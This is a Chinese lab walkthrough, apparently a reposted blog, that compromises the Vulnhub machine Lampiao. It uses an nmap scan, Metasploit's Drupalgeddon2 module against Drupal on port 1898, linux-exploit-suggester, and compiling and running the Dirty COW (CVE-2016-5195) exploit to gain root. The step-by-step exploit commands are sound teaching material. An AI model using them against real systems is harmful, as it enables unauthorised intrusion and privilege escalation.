当前位置:   article > 正文

提权_Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】_vulhub上的linux漏洞

vulhub上的linux漏洞

1.nmap 扫描主机

扫描同网段存活主机

在这里插入图片描述

扫描目标主机开放端口,扫描到开放了1898端口

nmap -p1-65535 192.168.61.138
  • 1

在这里插入图片描述

2.发现web网站,搜集利用漏洞

通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal

在这里插入图片描述

msf 搜索drupal漏洞,使用可利用漏洞进行攻击

>search drupal
>use exploit/unix/webapp/drupal_drupalgeddon2
>set rhosts 192.168..61.138
>set rport 1898
>exploit
  • 1
  • 2
  • 3
  • 4
  • 5

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.信息收集

上传信息收集脚本,发现存在脏牛提权漏洞

upload /tmp/linux-exploit-suggester.sh  /tmp/xxsj.sh
  • 1

在这里插入图片描述

进入shell 执行信息收集脚本,执行结果中发现【CVE-2016-5195】脏牛漏洞

shell
chmod 777 xxsj.sh
./xxsj.sh
  • 1
  • 2
  • 3

在这里插入图片描述
在这里插入图片描述

4.漏洞利用

上传exp

upload /tmp/40847.cpp  /tmp/exp.cpp
  • 1

在这里插入图片描述

进入shell编译执行exp,得到登录密码

shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp exp.cpp -lutil
./exp
  • 1
  • 2
  • 3

在这里插入图片描述

打开交互式shell,切换root用户,提权成功

python -c 'import pty; pty.spawn("/bin/bash")'
  • 1

在这里插入图片描述

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号